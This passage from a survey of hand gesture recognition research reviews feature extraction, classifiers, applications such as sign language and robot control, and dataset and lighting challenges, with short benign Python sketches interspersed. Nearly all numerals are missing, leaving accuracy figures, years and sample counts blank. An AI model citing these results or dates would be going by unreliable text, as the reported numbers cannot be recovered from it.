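hand_only = cv2.bitwise_and(frame, frame, mask=mask)       # hand isolated from the background
cv2.imwrite("hand_only.png", hand_only)
```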
this can be done using multi-scale color feature hierarchies that give the user's hand and the background different shades of color, so that the background can be identified and removed, or by using clustering algorithms that are capable of treating each finger as a cluster and removing the empty spaces in between them. in this subsection, we will be discussing the different features used by the different applications implemented in the reviewed work. furthermore, the feature extraction methods used will also be discussed.
feature extraction methods.
feature extraction methods are used in order to extract the useful information from the images that helps in the recognition process of gestures. these features can be extracted using several available methods, such as the fourier descriptor method, which captures the palm, the fingers and the fingertips, or the centroid method, which captures the essential structure of the hand. the work of haitham, alaa & sabah ( ) applied two methods of feature extraction, a contour hand and complex alhzat. in weiguo et al. ( ) a feature extraction module was applied using discrete fourier transform (dft) operations on histograms (vertical and horizontal). the proposed approach of salunke & bharkad ( ) took the input data from a portable webcam, processed the images and then extracted histogram of gradients features. the objective of himadri et al. ( ) was to segment the hands using polygon approximation and approximate convex decomposition, and then record the unique features between various convex segments of the hand as a method of feature extraction. a regional contrast (rc) based salient object extraction algorithm and a method using the color statistics of the image were used in qingrui et al. ( ). to detect the start and end points of gestures, a gesture spotting algorithm was applied in hari et al. ( ). the experiments of chenyang, yingli & matt ( ) followed five different feature extraction strategies: depth image sequence, body joints & facial landmarks, hand shapes & facial expressions/attributes. in jose et al. ( ), digital image processing techniques were used to eliminate noise, to improve the contrast under different illumination, to separate the hand from the background and to cut the region containing the hand. histogram of oriented gradients (hog) was used in vimonhak, aranya & somsak ( ) for image processing to extract characteristics of the hand. in the work of nilima & patil ( ), the accurate end point identification method was implemented and applied on gesture images captured in varying backgrounds to detect edge points and branch points, and it was also applied on blurred images containing multiple objects. the authors of isack, zhongfu & jamal ( ) employed the higher order local autocorrelation (hlac) feature extraction method. the authors of xi, chen & lihua ( ) proposed using wavelet invariant moments; the hand region was separated based on the depth information, the wavelet feature was calculated by enforcing the wavelet invariant moments of the hand region, and the distance feature was extracted by calculating the distance from the fingers to the hand centroid. time, frequency and time-frequency features were used in jiajun & zhiguo ( ) and andrés & marco ( ).
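as an illustration of the histogram of oriented gradients features mentioned in several of the works above, the following hedged python sketch (using scikit-image) turns a cropped grayscale hand image into a fixed-length hog descriptor; the patch size and hog parameters are illustrative assumptions, not values taken from the surveyed papers.

import cv2
from skimage.feature import hog

def hog_descriptor(gray_hand):
    # fixed-size patch so every gesture yields a descriptor of equal length
    patch = cv2.resize(gray_hand, (64, 64))
    # 9 orientation bins over 8x8-pixel cells grouped into 2x2-cell blocks
    return hog(patch, orientations=9, pixels_per_cell=(8, 8),
               cells_per_block=(2, 2), block_norm="L2-Hys")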
the authors of chenyang, xin & lianwen ( ) used a robust feature, the path signature (ps), and its compressed version, the log path signature (lps), to extract effective features of hand gestures. discrete wavelet transformation and singular value decomposition were used for feature extraction, and a genetic algorithm with an effective fitness function was used to select optimal features by eliminating redundant and irrelevant ones to improve the recognition performance of the system in rasel et al. ( ). in rania, mohammed & mahmoud ( ) a system for hgr based on reducing the dimensionality of the histogram of oriented gradients feature vectors by applying principal component analysis was implemented. a hand gesture recognition method based on salient feature point selection was proposed in yiwen et al. ( ); the shape feature of the hand gesture was extracted from the contour, and the salient feature points were selected by a new algorithm to represent the hand gesture. in the experiments of vivek, ramesh & kagalkar ( ) image processing techniques such as contour analysis based on edge detection, wavelet transform, erosion, dilation, blur removal and noise elimination were used; they also used the histogram of oriented gradients (hog) for shape feature extraction and principal component analysis for feature set optimization and reduction. they also used a polygonal shape approximation strategy with a special chain-coding for shape-similarity matching in oyndrila et al. ( ). in vladislava, predrag & goran ( ) recognition was for hand gestures; images were captured on two different backgrounds and with several space orientations, and the histogram of oriented gradients method was applied for feature extraction. a gaussian mixture model (gmm) based on human skin pixels, which tracks the segmented foreground using optical flow to detect the hand swipe direction, was proposed in srinidhi et al. ( ). the authors of ananta & piyanuch ( ) employed daubechies wavelet transforms for feature extraction. in rajeshree & jayashree ( ) they proposed a new method to find the flow of the hand for special signs using chain code, and a recognition technique for signs (dynamic digits) that is independent of the size and color of the hand, using binary images. in ashish & aarti ( a) and ashish & aarti ( b) feature extraction was done using blob detection and contour extraction. in jessie et al. ( ) image processing techniques such as color segmentation, visual hand tracking, pre-processing, and feature extraction were used. in ashish & aarti ( a) and ashish & aarti ( b) features were extracted using color filtering and skin segmentation; a convex hull algorithm was implemented just for finger point detection and number recognition. in lalit & pritee ( ), an acquisition module that spots the legitimate gesture trajectory by implementing pen-up and pen-down actions using depth thresholding and velocity tracking was proposed; the extracted trajectory is recognized using the equipolar signature (eps) technique. a conventional method was used in devendrakumar & kakade ( ) to separate the hand from the surrounding environment and then find palm points. each hand part in shome ( ) was modeled as a convex hull and the pairwise distance between the parts was calculated using the gjk-epa algorithm.
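the dimensionality-reduction step described for hog vectors (for example in rania, mohammed & mahmoud) can be sketched with principal component analysis as follows; this is a generic scikit-learn example, and the file name hog_features.npy and the number of components are hypothetical.

import numpy as np
from sklearn.decomposition import PCA

# hypothetical file holding one hog descriptor per training image, shape (n_samples, n_features)
X = np.load("hog_features.npy")
pca = PCA(n_components=50)          # keep the 50 strongest components (illustrative choice)
X_reduced = pca.fit_transform(X)
print(X.shape, "->", X_reduced.shape,
      "kept variance:", pca.explained_variance_ratio_.sum())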
principal component analysis (pca) was used in marlon, alistair & mohamed ( ) to reduce the dimensionality and extract features of images of the human hand. the work in anshal, heidy & emmanuel ( ) processed the hand gesture image by combining image segmentation and edge detection to extract morphological information, and frames were processed using the multi-modality technique used for processing individual characters. in vedha viyas et al. ( ), to improve the recognition rate of hand gestures, various image processing techniques were used, such as histogram equalization, median filtering, average filtering, and morphological filtering; image matching for feature extraction was done using the cross-correlation coefficient. the proposed techniques in riya et al. ( ) relied on multiple representations, namely hog, gist and bsif; they used feature fusion, which is the process of combining two feature vectors to obtain a single feature vector. a model for extracting a series of features based on convexity defect detection was proposed in soukaina et al. ( ), taking advantage of the close relationship between convexity defects and fingertips.
features extracted.
the features extracted change from one application to another; some of the features that could be taken into consideration are: finger status, thumb status, skin color, alignment of the fingers, and the palm position (ananya, anjan kumar & kandarpa kumar, ). there are several features that could be considered and extracted from the hand gestures, and they are highly dependent on the application. the skin color feature was used in weiguo et al. ( ), xiang, lei & qiang ( ) and rokhsana et al. ( ). hand gestures in himadri et al. ( ) were represented by hand shapes, orientations and movement of the hands, alignment of the fingers, and the palm position. in david & donghan ( ) open hand, wrist radial deviation, ulnar deviation, wrist extension, wrist flexion, and closed fist were considered. scale, rotation, translation, illumination, noise and background were extracted in the work of jose et al. ( ). in yuta et al. ( ) finger movements were observed because the muscles and bones on the back of the hand are linked to the fingers; skin deformation was also measured through the distance between the device and the skin with sensors. the classifier in piotr, tomasz & jakub ( ) had five gestures (fist, pronation, supination, flexion, extension), and the feature vector consisted of features: five representing muscle activity (rms) and parameters corresponding to the relative sensor orientation. a feature vector composed of wavelet invariant moments and a distance feature was generated by the work of xi, chen & lihua ( ). the authors of shunzhan et al. ( ) extracted five eigenvalues in the time domain. geometric features such as area and centroid were extracted from each video frame to capture the trajectory of the moving hand and compare it with the training gestures in the experiments of atharva & apurv ( ). the features used in gunawardane & nimali ( ) were position, orientation, velocity, acceleration, and the bending angle of the fingers. to represent the global movement of the hand skeleton, global motion features were extracted by xinghao et al. ( ). in the experiments of sih-huei et al.
( ) the hand region is recognized by using information about the skeleton of the segmented depth images, then a histogram of the oriented normal d (hon d) and a histogram of oriented gradients (hog) were extracted to represent the motion patterns. for each hand gesture type, occlusion, light, shadow and background were considered as features in biyao et al. ( ), whereas the work of anna, sung & jae-gon ( ) presented a detection method that utilizes the depth image obtained from incoming stereo image sequences and skin color information in a combined way; hand contours detected based on bezier curves were also presented to provide an interoperable interface between a detection module and a recognition module, and a set of hand gestures with a combination of open fingers and rotational angles was used for the hand gesture recognition of their system. the proposed system (oyndrila et al., ) identified the hand palm in a video stream based on skin color and a background subtraction scheme. in rishabh et al. ( ) glove tracking was done and then fingertips were detected with respect to the centroid of the hand. features used in ashish & aarti ( a) and ashish & aarti ( b) were orientation, centre of mass (centroid), finger status, and thumb status in positions of raised or folded fingers of the hand. on the other hand, the features extracted in soumya & muzameel ( ) were size, shape, color or texture. flexion, extension, abduction and grasp of forearm muscle features were used to detect four different movements of the wrist (stefano et al., ). the features had to be able to characterize gestures and be invariant under translation and rotation of the hand gesture to ensure reliable recognition in soukaina et al. ( ).
classification of hand gestures
the extracted features are sent to train and test a classification algorithm (such as artificial neural networks (ann), k-nearest neighbor (knn), naive bayes (nb), support vector machine (svm), etc.) to reach the output gesture; for example, in a simple case the output can contain two classes to detect only two gestures, such as open and closed hand gestures, or sign language gestures as shown in fig . the classification of the information extracted from the images of hand gestures is required so that these gestures can be recognized by the computer; there are several classification algorithms that can be used for this purpose. the work of haitham, alaa & sabah ( ), weiguo et al. ( ), rosalina et al. ( ), jakub, tomasz & piotr ( ), piotr, tomasz & jakub ( ), shunzhan et al. ( ), erhan, hakan & baran ( ), vladislava, predrag & goran ( ), deepali & milind ( ) and ananta & piyanuch ( ) proposed using artificial neural networks (ann) for classification, whereas in jakub, tomasz & piotr ( ) and piotr, tomasz & jakub ( ) a softmax output layer was used with a feedforward ann; in shunzhan et al. ( ), erhan, hakan & baran ( ), alvi, fatema & mohammad ( ), vladislava, predrag & goran ( ), deepali & milind ( ) and ananta & piyanuch ( ) backpropagation training methods were used, and the authors in jessie et al. ( ) used kohonen self-organizing maps as a type of ann to classify data sets in an unsupervised manner to convert hand gestures into filipino words. in chun-jen et al. ( ), a synthetically-trained neural network was used for d hand gesture identification. the training process of a deep-learning neural network required a large amount of training data.
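a minimal example of the ann-style classification stage discussed above is sketched below with a small multi-layer perceptron in scikit-learn; the synthetic feature matrix stands in for real gesture descriptors, so the numbers printed are placeholders rather than results from any surveyed system.

from sklearn.datasets import make_classification
from sklearn.model_selection import train_test_split
from sklearn.neural_network import MLPClassifier
from sklearn.metrics import accuracy_score

# synthetic stand-in for gesture feature vectors (e.g., reduced hog descriptors) and labels
X, y = make_classification(n_samples=500, n_features=50, n_informative=20,
                           n_classes=5, random_state=0)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=0)
ann = MLPClassifier(hidden_layer_sizes=(128, 64), max_iter=500, random_state=0)
ann.fit(X_train, y_train)
print("test accuracy:", accuracy_score(y_test, ann.predict(X_test)))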
the authors of chenyang, xin & lianwen ( ) proposed using lpsnet, an end-to-end deep neural network for hand gesture recognition with novel log path signature features. in yifan et al. ( ) and biyao et al. ( ) they proposed using deep neural networks for classification. the authors in sungho & wonyong ( ) came up with two dynamic hand gesture recognition techniques using low-complexity recurrent neural network (rnn) algorithms for wearable devices; the first was based on a video signal and used a convolutional neural network (cnn) with an rnn for classification, and the other used accelerometer data and applied an rnn for classification. in contrast, xinghao et al. ( ) used a bidirectional recurrent neural network (rnn) with the skeleton sequence to augment the motion features. a deep convolutional neural network was used for classification in ibrahim et al. ( ), david & donghan ( ), javier, paula & robinson ( ), jose et al. ( ), aditya et al. ( ), yuntao et al. ( ), peijun et al. ( ), jozef & slavomír ( ), jiajun & zhiguo ( ), takuya et al. ( ) and fabian et al. ( ). in aditya et al. ( ) the authors aimed to improve the detection of hand gestures by correcting the probability estimate of a long short-term memory (lstm) network with pose prediction performed by a convolutional neural network (cnn); they used principal component analysis (pca) as a training procedure to reduce the labelled data of hand pose classification and to improve the initialization of the cnn weights. the authors in fuchang & hijian ( ), salunke & bharkad ( ) and marlon, alistair & mohamed ( ) used the k-nearest neighbor (knn) classifier to recognize hand gestures. the work presented in kuang-yow et al. ( ) performed the recognition using a combination of k-nearest neighbor (knn) and decision tree algorithms. support vector machine (svm) was used for classification in yuhui, shuo & peter ( ), chenyang, yingli & matt ( ), yuta et al. ( ), xi, chen & lihua ( ), rasel et al. ( ), reshna & jayaraju ( ), zengshan et al. ( ), ashish & aarti ( a), ashish & aarti ( b), zhiwen et al. ( ) and stefano et al. ( ). a decision tree was used to classify the gestures in shengchang et al. ( ). to recognize the patterns in jian et al. ( ), they used a modified deep forest algorithm. in shaun et al. ( ) and riya et al. ( ), they used a random regression forest algorithm for classification. in jinxing, jianhong & jun ( ) the hand gesture was modeled and decomposed by the use of gaussian mixture model-hidden markov models (gmm-hmm), where gmms are used as sub-states of hmms to decode the semg features of the gesture. moreover, a hand gesture recognition system was implemented by incorporating the bhattacharyya divergence into bayesian sensing hidden markov models (bs-hmm) in sih-huei et al. ( ). also, in devendrakumar & kakade ( ) a hidden markov model was used for classification. the work of hari et al. ( ), atharva & apurv ( ), yiwen et al. ( ) and washef, kunal & soma ( ) presented using the dynamic time warping algorithm for classification, whereas marco et al. ( a) and marco et al. ( b) used the k-nearest neighbor rule together with the dynamic time warping algorithm for classification. naive bayes was applied as the training method for classification in eko, surya & rafiidha ( ). a multiple linear discriminant analysis (lda) classifier was adopted to classify different hand gestures in isack, zhongfu & jamal ( ) and yuefeng et al.
( ). classification of digit gestures from to was done using principal component analysis by rajeshree & jayashree ( ). the work (danling, yuanlong & huaping, ) used an extreme learning machine (elm) for gesture recognition. the work presented in himadri et al. ( ) used support vector machine (svm), artificial neural network, naive bayes and k-nearest neighbor (k-nn) classifiers as the training methods to recognize the extracted features. in contrast, in ananyaa et al. ( ) the best classification accuracy was achieved using euclidean distance and eigenvectors, but this result is for a very small dataset; the best result for a dataset containing nearly images was obtained using a support vector machine for classification, and using an artificial neural network provided an accuracy of . %. furthermore, multi-class support vector machine (svm) and k-nearest neighbors (knn) classifiers were used to classify the hand gestures in rania, mohammed & mahmoud ( ); experiments showed that the accuracy of the knn classifier was better than that of the svm classifier. in nabeel, rosa & chan ( ) support vector machine (svm), decision tree (dt), k-nearest neighbors (knn), and linear discriminant analysis (lda) were compared in terms of classification performance, and results showed that lda achieved the highest accuracy.
hand gesture recognition applications
hand gestures can be used as a natural means of communication with the computer; with today's technologies, the number of applications that could apply hand gesture recognition is rapidly increasing. in this section, we will be discussing the most recent applications that were presented in the years to .
sign language
sign languages, as illustrated in fig , use manual communication to explain a certain meaning. this can include using hand gestures, movements and finger orientations to deliver a certain word or meaning. the work of weiguo et al. ( ), chenyang, yingli & matt ( ), rasel et al. ( ), shaun et al. ( ), deepali & milind ( ), nabeel, rosa & chan ( ) and anshal, heidy & emmanuel ( ) proposed using hand gesture recognition for american sign language (asl) for people who are hearing impaired, whereas in shaun et al. ( ) they did not evaluate the letters that are dynamic (like j and z). in nabeel, rosa & chan ( ) gestures were studied including asl alphabets and asl numbers. in anshal, heidy & emmanuel ( ) two different translation paradigms, english characters (alphabet) and complete words or phrases, were proposed. an alternative to talking for people who have hearing or speech problems, using sign language recognition and hand gestures, was proposed in himadri et al. ( ), oinam et al. ( ), reshna & jayaraju ( ), vivek, ramesh & kagalkar ( ), oyndrila et al. ( ), ashish & aarti ( a), ashish & aarti ( b) and rishabh et al. ( ). whereas in rosalina et al. ( ) a sign language that consists of the alphabet from ''a'' to ''z'', the numbers from '' '' to '' '', and some additional punctuation marks like ''period'', ''question mark'', and ''space'' was recognized using static hand gesture recognition. the work of jose et al. ( ) used the alphabet of the sign language of peru (lsp). also, vimonhak, aranya & somsak ( ) proposed a technique for the recognition of lao alphabet sign language for deaf people.
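several of the surveyed works compare classical classifiers (svm, knn, lda, decision trees) on the same feature set, as in nabeel, rosa & chan above; a hedged sketch of such a comparison with cross-validation is shown below, again on synthetic stand-in features rather than data from any surveyed study.

from sklearn.datasets import make_classification
from sklearn.model_selection import cross_val_score
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.tree import DecisionTreeClassifier

# synthetic stand-in for a gesture feature matrix and its labels
X, y = make_classification(n_samples=600, n_features=100, n_informative=30,
                           n_classes=6, random_state=0)
models = {"svm": SVC(), "knn": KNeighborsClassifier(n_neighbors=5),
          "lda": LinearDiscriminantAnalysis(), "dt": DecisionTreeClassifier(random_state=0)}
for name, model in models.items():
    # 5-fold cross-validated accuracy for each classical classifier
    print(name, round(cross_val_score(model, X, y, cv=5).mean(), 3))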
in eko, surya & rafiidha ( ), the indonesian sign language system (sibi) was applied for hearing people to learn sign language and communicate with people with hearing disabilities. moreover, in donq-liang & wei-shiuan ( ), the authors used turkish fingerspelling signs. a framework for recognizing sinhala sign language gestures and translating them into natural language for hearing- and speech-impaired people was proposed in vladislava, predrag & goran ( ). the authors of jessie et al. ( ) converted hand gestures into filipino words. the work presented in marlon, alistair & mohamed ( ) used the alphabet of irish sign language. finally, an indian sign language (isl) hand gesture recognition system was introduced in riya et al. ( ).
robotics
hand gestures can also be employed in the process of building robotics, as illustrated in fig (elecbits, ), which shows the use of a glove to control a robotic vehicle.
figure example of the use of hand gestures in robotics (elecbits, ).
a recognition framework for continuous hand gestures of an upper-limb exoskeleton robot was proposed in jinxing, jianhong & jun ( ). in yuhui, shuo & peter ( ) they had three groups of hand gestures: six wrist gestures, five single finger flexions, and ten chinese number gestures that were built to control a robotic arm. the authors of sungho & wonyong ( ) came up with two dynamic hand gesture recognition techniques using low-complexity recurrent neural network (rnn) algorithms for a wearable device. the experiments of xiang, lei & qiang ( ) produced a control system for a robotic wheelchair for the aged and the disabled, which contained two parts: gesture interaction and the intelligent wheelchair. also, the approach of javier, paula & robinson ( ) allowed the consequent execution of a robotic agent for the delivery of objects. in yuntao et al. ( ) the authors introduced a wearable sensor suite fusing arm motion and hand gesture recognition for operator control of uavs. the authors of yuta et al. ( ) proposed a wearable device with photo-reflective sensors arranged in an array to recognize hand gestures by measuring the skin deformation of the back of the hand. also, in danling, yuanlong & huaping ( ) hand gesture recognition was used in human–robot interaction (hri). in the experiments of devendrakumar & kakade ( ), the continuous trajectory path made by the hand over a period of time was considered for real-time dynamic gesture recognition using a kinect sensor for controlling a robotic arm. a hand gesture-based control design was proposed for mobile robots in hang et al. ( ), where mobile robots can move according to the signals encoded by hand gestures. the work of vedha viyas et al. ( ) dealt with controlling a robotic arm using hand gestures for many applications such as automation, medical applications and gaming.
others
static hand gesture recognition in a real-time human–computer interaction application was proposed in salunke & bharkad ( ) to control powerpoint presentations from a distance. a human–computer interaction based on hand gestures in a projector-camera system was presented in qingrui et al. ( ). also, real-time hand gesture recognition for flight control of multiple quadrotors was applied in david & donghan ( ).
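many of the command-style applications above map a small set of static hand shapes, for example the number of extended fingers, to actions. one lightweight vision-based way to estimate that count, related to the convexity-defect features mentioned earlier, is sketched below; this is only a rough illustration, and the depth and angle thresholds are assumptions that would need tuning.

import cv2
import numpy as np

def count_extended_fingers(hand_contour):
    # convexity defects need hull point indices, not coordinates
    hull = cv2.convexHull(hand_contour, returnPoints=False)
    defects = cv2.convexityDefects(hand_contour, hull)
    if defects is None:
        return 0
    gaps = 0
    for start, end, far, depth in defects[:, 0]:
        a = np.linalg.norm(hand_contour[start][0] - hand_contour[far][0])
        b = np.linalg.norm(hand_contour[end][0] - hand_contour[far][0])
        c = np.linalg.norm(hand_contour[start][0] - hand_contour[end][0])
        # angle at the defect point via the law of cosines
        angle = np.arccos(np.clip((a * a + b * b - c * c) / (2 * a * b + 1e-6), -1.0, 1.0))
        # deep, sharp defects correspond to gaps between raised fingers
        if depth > 10000 and angle < np.pi / 2:   # depth is in 1/256 pixel units
            gaps += 1
    return gaps + 1 if gaps else 0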
the authors of javier, paula & robinson ( ) presented the design of a convolutional neural network architecture using the matconvnet library in order to achieve the recognition of the classes ''open'', ''closed'' and ''unknown''. the approach studied in marco et al. ( a) and marco et al. ( b) could be used in multiple applications in the medical and engineering fields. the study of aditya et al. ( ) showed hand gesture recognition on top-view hand images observed by a time-of-flight (tof) camera for touchless interactions inside a car. in peijun et al. ( ) they used seven kinds of hand gestures that can command a consumer electronics device, such as mobile phones and tvs. the authors in siji rani, dhrisya & ahalyadas ( ) proposed an augmented reality (ar) system to merge the virtual world into the real world and to enhance the perception of the real world by adding -d virtual objects. the experiments of yu et al. ( ) described a method of hand gesture recognition using principal component analysis (pca) implemented on an android phone. a real-time hand gesture recognition system using electromyography (emg) was proposed for the fields of medicine and engineering, with a higher number of gestures to recognize, in marco et al. ( a) and marco et al. ( b). the work of rokhsana et al. ( ) presented a hand gesture-based computer mouse control system. the authors of hafız et al. ( ) presented a cmswvhg (control ms windows via hand gesture) to perform numerous windows actions using hand gestures. the work discussed in anna, sung & jae-gon ( ) presented a method to detect and recognize hand gestures for generating hand gesture-based commands to control media consumption in smart glasses. hand gesture recognition or finger angle prediction for ultrasound imaging was proposed in yuefeng et al. ( ). a hand gesture recognition technique on a smartphone using google cardboard (gc) and wearality was applied in srinidhi et al. ( ). a real-time hand gesture recognition technique for presentations was proposed in rishabh et al. ( ), to control the os on a projected screen for a virtual mouse system without any extra hardware. hand gesture-based commands were proposed in lalit & pritee ( ) to replace touch and electromechanical input panels using vision-based mid-air character input. a gesture recognition system was proposed in soumya & muzameel ( ) for mudra, an expressive form of gesture that is mainly used in indian classical dance, where the gesture is in visual form to connect with the audience. the authors in zhiwen et al. ( ) presented real-time hand gesture recognition using a kinect sensor to control the mouse with the user's hands for operations such as 'clicking', 'dragging' and 'dropping', and engaged/disengaged gestures. gesture recognition in karthik et al. ( ) was used for bio-robotics; the paper focused on presenting sensor-based human gesture recognition for the hand cricket game.
hand gesture recognition challenges
the process of hand gesture recognition consists of a set of complex steps with many possible difficulties that could stand in the way of accurate recognition. in this section, we will discuss the major environmental surroundings challenges and the training and testing dataset challenges that could occur.
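both families of problems discussed below, illumination or pose variation and small training sets, are often softened by augmenting the training images; a rough opencv sketch of such augmentation is given here, with the brightness, rotation and scale ranges chosen only for illustration and not taken from any surveyed work.

import cv2
import numpy as np

def augment(image, rng=None):
    rng = rng or np.random.default_rng()
    # random gain to mimic dull / medium / bright lighting conditions
    gain = rng.uniform(0.6, 1.4)
    out = np.clip(image.astype(np.float32) * gain, 0, 255).astype(np.uint8)
    # small random rotation and scale to mimic hand pose variation
    h, w = out.shape[:2]
    m = cv2.getRotationMatrix2D((w / 2, h / 2), rng.uniform(-20, 20), rng.uniform(0.9, 1.1))
    return cv2.warpAffine(out, m, (w, h), borderMode=cv2.BORDER_REPLICATE)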
environmental surroundings
in fuchang & hijian ( ) the environmental background, light, and rotation, translation and scale changes posed a difficulty; the authors used depth data to help in hand separation and to obtain synchronized color and depth images with the kinect. different light brightness (dull, medium, and bright) conditions were tested in salunke & bharkad ( ) to overcome this problem; the bright light level gave the best accuracy, as expected. furthermore, the results of oinam et al. ( ) showed that the vision-based techniques gave an accuracy of % in bright lighting conditions with a white background. the work of qingrui et al. ( ) showed that it was difficult to achieve proper accuracy with complex backgrounds, variable external illumination, and shadows of the hand gesture. the authors of hari et al. ( ) presented a continuous hand gesture recognition technique using three-axis accelerometer and gyroscope sensors in smartphones; a gesture coding algorithm was also used to reduce the influence of the unsteadiness of the user hand. digital image processing techniques were used in jose et al. ( ) to eliminate noise, to improve the contrast under different illumination, to separate the hand from the background and to cut the region containing the hand; images with complex backgrounds got low accuracy. in rytis & arunas ( ) the authors suggested that rgb cameras can be used to detect the hand, but this has limited applications because hand detection was hard in some lighting conditions or for different skin colors; using depth camera data was better for distinguishing hands in front of the camera. the study of peijun et al. ( ) suggested that spatial localization of the hands when the image contains background, a human face, and a human body could be a challenging task; the results achieved an accuracy of . % in the dataset with simple backgrounds and . % in the dataset with complex backgrounds. the authors of yu et al. ( ) were capable of solving the problems that faced them, such as different sizes of the captured gesture image, different angles of gesture rotation and flipped gestures. after the experiments of atharva & apurv ( ) they found that if the kinect captures an object larger than the hand, wrong results will be achieved. the results of hafız et al. ( ) were highly affected by the background noise, and they achieved an accuracy of . %. in the experiments of yifan et al. ( ), to strengthen the recognition accuracy, and as the dataset used contained more than , gestures and , , frames for both color and depth modalities from subjects, they tested different static and dynamic gestures in six diverse indoor and outdoor scenes with variation in background and illumination; they also tested when people perform gestures while walking and achieved an acceptable accuracy. in reshna & jayaraju ( ) the authors used complex backgrounds with respect to the skin color, and results showed a disadvantage of this system, which was the lighting conditions. the results of rania, mohammed & mahmoud ( ) showed that the proposed algorithm achieved a recognition rate of . % under different hand poses and complex backgrounds with changes in lighting; moreover, their system was robust to rotation, scale, translation, and lighting. also, the results of yiwen et al.
( ) showed that their method adapted to translation, rotation, scaling and articulated deformation. time-of-flight (tof) data, which tends to be overly noisy depending on various factors such as illumination, reflection coefficient and distance, was used in fabian et al. ( ); these factors were studied in their research process. the system of washef, kunal & soma ( ) overcame the limitations of a glove-based approach and the vision-based approach concerning different illumination conditions, background complexity and distance from the camera. the system in lalit & pritee ( ) was applicable for rotation, scale, and translation variations and different directions, and the dataset contained digits, alphabets, and symbols.
training and testing data
the training and testing data problems can be classified as either having a small set of gestures that is insufficient for recognition training, or having a large set of gestures that is imbalanced, leading to a low recognition accuracy. the training data of haitham, alaa & sabah ( ) had only images and the results reached an accuracy of . %. in weiguo et al. ( ) they trained their system using static american sign language (asl) and their accuracy reached . %, whereas in fuchang & hijian ( ) they used detailed features to avoid the problem of having imbalanced data and images. to overcome the problem of having more than one meaning and movement to represent a gesture, the authors of oinam et al. ( ) used vision-based and data glove-based hand gesture recognition systems. in jian et al. ( ) hand gestures including dynamic and six static gestures were used, and results showed that gestures were correctly recognized and the accuracy was %. the work in ibrahim et al. ( ) tested the system using ten hand gestures, achieving their goal, which was to maximize the recognition accuracy using pre-trained networks. the data of javier, paula & robinson ( ) contained six architectures with variance in the hyperparameters and depth; their results achieved good accuracy. classification of hand gestures to improve the recognition accuracy was proposed in jose et al. ( ), reaching . % for simple backgrounds. in aditya et al. ( ) five hand poses with nine-class hand gestures were used, reaching an accuracy of . %. the work of vimonhak, aranya & somsak ( ) used lao alphabets in the experiments; the testing data had gestures from four individuals, and it was difficult to maintain a constant speed of the hand gestures, thus the recognition rate was %. the main difficulties of hand gesture recognition (andrés & marco, ) with emg using machine learning are the noisy behavior of the emg signal and the small number of gestures per person relative to the amount of data generated by each gesture (overfitting). in chun-jen et al. ( ) the training process of a deep-learning neural network required a large amount of training data; they combined a large set of computer-generated d hand images with a few real camera images to form the training data set, the testing and training sets had classes of hand gestures, and the resulting accuracy was . %. the authors of deepali & milind ( ) considered different alphabets of american sign language, with a total of samples (consisting of samples of each alphabet), and results gave an accuracy of . %. in the study of stefano et al.
( ), to avoid correlation between training and testing datasets, the leave-one-subject-out (loso) cross-validation technique was used, and the accuracy was . %.
the future of hand gesture recognition
despite the high performance of some of the recent methods discussed in this research, hand gesture recognition is still an evolving topic that needs more experiments. hand gesture recognition methods also need to be extended to cover all of the areas of information technology and artificial intelligence, such as tablets, smartphones, gaming consoles, smart televisions, laptops and desktops (hexa, ). there is no doubt that hand gesture recognition is capable of bringing natural communication and intelligence into applications that humans use every day. hand gesture recognition employs the principle of perceptual computing and is changing the methods of human–computer interaction (hci), making them less complex and more enjoyable. applications such as home control systems, healthcare systems, gaming technologies, automobiles, televisions, home automation, and robotics are expected to be able to use hand gesture recognition to represent the communication between the user and the devices (hexa, ). furthermore, some applications are very sensitive and need a recognition accuracy close to % to be usable without causing any damage or danger to human lives, such as applications in the health, transportation, and flight operation fields. as hand gesture recognition was recently applied in some gaming consoles and has increased the sales rate of these consoles (such as xbox and playstation), it is expected to keep growing over time. smartphones are expected to experience the highest growth of hand gesture recognition (hexa, ). smart televisions are also expected to experience growth in this topic and to increase the purchasing rate of the latest technology using hand gestures (hexa, ). the topic is expected to grow over % from the year to (hexa, ).
conclusions
this paper has presented the most prominent techniques, applications, and challenges in hand gesture recognition. these include the gesture acquisition methods, the feature extraction process, the classification of hand gestures, the applications that were recently proposed in the fields of sign language, robotics and other areas, the environmental surroundings challenges and the dataset challenges that face researchers in the hand gesture recognition process, and the future of hand gesture recognition. the results of this paper can be summarized as follows: surface electromyography (semg) sensors with wearable hand gesture devices were the most frequently used acquisition tools in the works studied. also, the artificial neural network (ann) was the most applied classifier, the most popular application was using hand gestures for sign language, the dominant environmental surrounding factor that affected the accuracy was the background color, and the common problem found in many of the studies was overfitting in the datasets.
additional information and declarations
funding
the authors received no funding for this work.
competing interests
the authors declare there are no competing interests.
author contributions • mais yasen conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • shaidah jusoh conceived and designed the experiments, contributed reagents/material- s/analysis tools, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: the data used in the experiments of our research was collected from ieee, and is available at figshare: yasen, mais ( ): literature.rar. figshare. dataset. https: //doi.org/ . /m .figshare. .v . a sample of the data is available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references aashni h, archanasri s, nivedhitha a, shristi p, jyothi sn. . international confer- ence on advances in computing & communications. science direct : – . adam k. . human gestures tools. in: language and cognition in human evolution. cambridge: cambridge university press. adam k. . gesture: visible action as utterance. cambridge: cambridge university press. aditya t, bertram t, frederic g, didier s. . a probabilistic combination of cnn and rnn estimates for hand gesture based interaction in car. in: international symposium on mixed and augmented reality ismar-adjunct. piscatway: ieee, – . alvi m, fatema tj, mohammad ay. . an efficient approach of training artificial neural network to recognize bengali hand sign. in: international conference on advanced computing iacc. piscatway: ieee, – . ananta s, piyanuch s. . artificial neural networks for gesture classification with inertial motion sensing armbands. in: conference tencon. piscatway: ieee, – . ananya c, anjan kumar t, kandarpa kumar s. . a review on vision-based hand gesture recognition and applications. igi global : – . ananyaa s, ayush k, kavleen k, shivani j, richa u, sameer p. . vision based static hand gesture recognition techniques. in: international conference on communication and signal processing iccsp. piscatway: ieee, – . andrea a. . advantages and drawbacks of gesture-based interaction. computer science—miscellaneous : – . yasen and jusoh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /m 